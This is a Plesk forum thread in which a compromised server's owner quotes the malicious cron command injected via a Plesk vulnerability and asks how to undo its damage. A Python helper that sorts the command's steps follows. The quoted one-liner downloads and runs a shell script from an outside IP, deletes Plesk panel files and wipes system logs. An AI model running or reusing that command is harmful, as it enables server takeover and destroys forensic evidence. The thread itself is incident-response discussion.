
Help reverting changes due to exploit

matteosistisette

New Pleskian

Hi,

I have received an attack that probably exploited the vulnerability described in:
http://kb.parallels.com/en/113321

Someone or something was able to inject a cronjob into my server which ran:

Cron <root@ks3094309> cd /tmp;wget http://128.173.237.127:8080/browser/browser/backup1.sh;chmod x backup1.sh;sh /tmp/backup1.sh;rm -Rf /tmp/backup1.sh;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/control.php;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/eng.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/control.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/logs/httpsd_access_log;rm -Rf /var/log/cron;rm -Rf /var/log/secure;rm -Rf /var/log/lastlog;rm -Rf /var/log/auth.log;cd /usr/local/psa/admin/htdocs/enterprise/control/;mv agent.php agenti.php;mv old.php agenti.php;mv Agent.php agenti.php


Among other things this downloads and executes a shell script. I'm already investigating the content of the script and how to revert (if possible) the changes it did.

However, the command above does also other things that I don't understand. It seems like it screwed up some components of Plesk.

AFTER this, I installed all the updates and ran the vulnerability check available here: http://kb.parallels.com/en/113424 which returned OK (it didn't before the updates).

The question is: can anybody explain to me what the above-mentioned commands do, which components of psa may have been compromised, and how I can restore them? (Not taking into account the execution of the downloaded shell script, of course.)
Or can I assume that by installing the updates, any compromised Plesk components have been restored? (I guess not)

Thanks
m.
 
There MUST be some tool provided by Parallels to fix the damage done by this attack. I have seen posts by people affected by the exact same attack, so I guess it's been pretty common, and after all this is due to a security vulnerability in Plesk...
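A small triage helper for the cron one-liner quoted in the post, added here as an example (it is not code from the post or from Plesk). It assumes a placeholder download host in place of the real one and splits the `;`-chained command into steps, bucketing each by effect so a reader can see at a glance which steps wipe logs and which touch Plesk panel files.

```python
import posixpath
from typing import Dict, List

# Constructed sample: the cron command from the post, shortened, with the
# download host replaced by a placeholder so nothing here points anywhere.
CRON_CMD = (
    "cd /tmp;wget http://placeholder.invalid:8080/backup1.sh;"
    "chmod x backup1.sh;sh /tmp/backup1.sh;rm -Rf /tmp/backup1.sh;"
    "chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/control.php;"
    "rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/control.php;"
    "rm -Rf /usr/local/psa/admin/logs/httpsd_access_log;rm -Rf /var/log/secure;"
    "cd /usr/local/psa/admin/htdocs/enterprise/control/;mv agent.php agenti.php"
)

LOG_DIRS = ("/var/log/", "/usr/local/psa/admin/logs/")   # evidence locations
PLESK_WEB = "/usr/local/psa/admin/htdocs/"               # panel web root


def triage(cmd_chain: str) -> Dict[str, List[str]]:
    """Split a ';'-chained shell one-liner and bucket each step by what it
    does to the host: download, execution, log wiping, Plesk file tampering."""
    found: Dict[str, List[str]] = {
        "download": [], "execute": [], "unlock-attr": [], "wipe-log": [],
        "plesk-tamper": [], "delete": [], "other": [],
    }
    cwd = "/"
    for step in (s.strip() for s in cmd_chain.split(";") if s.strip()):
        tok = step.split()
        cmd, args = tok[0], [a for a in tok[1:] if not a.startswith("-")]
        # resolve relative operands against the directory a prior 'cd' set
        paths = [posixpath.normpath(posixpath.join(cwd, a)) for a in args]
        if cmd == "cd":
            cwd = paths[0] if paths else "/"
        elif cmd in ("wget", "curl"):
            found["download"].extend(args)
        elif cmd in ("sh", "bash"):
            found["execute"].extend(paths)
        elif cmd == "chattr":   # clears immutable/append-only flags first
            found["unlock-attr"].extend(paths)
        elif cmd == "rm" and any(p.startswith(LOG_DIRS) for p in paths):
            found["wipe-log"].extend(paths)      # anti-forensic log removal
        elif cmd in ("rm", "mv") and any(p.startswith(PLESK_WEB) for p in paths):
            found["plesk-tamper"].extend(paths)  # panel files to restore
        elif cmd == "rm":
            found["delete"].extend(paths)
        else:
            found["other"].append(step)
    return found
```

Files in the `plesk-tamper` bucket are the ones worth comparing against a clean install of the same Plesk version, and the `wipe-log` bucket tells you which local logs cannot be trusted for the timeline.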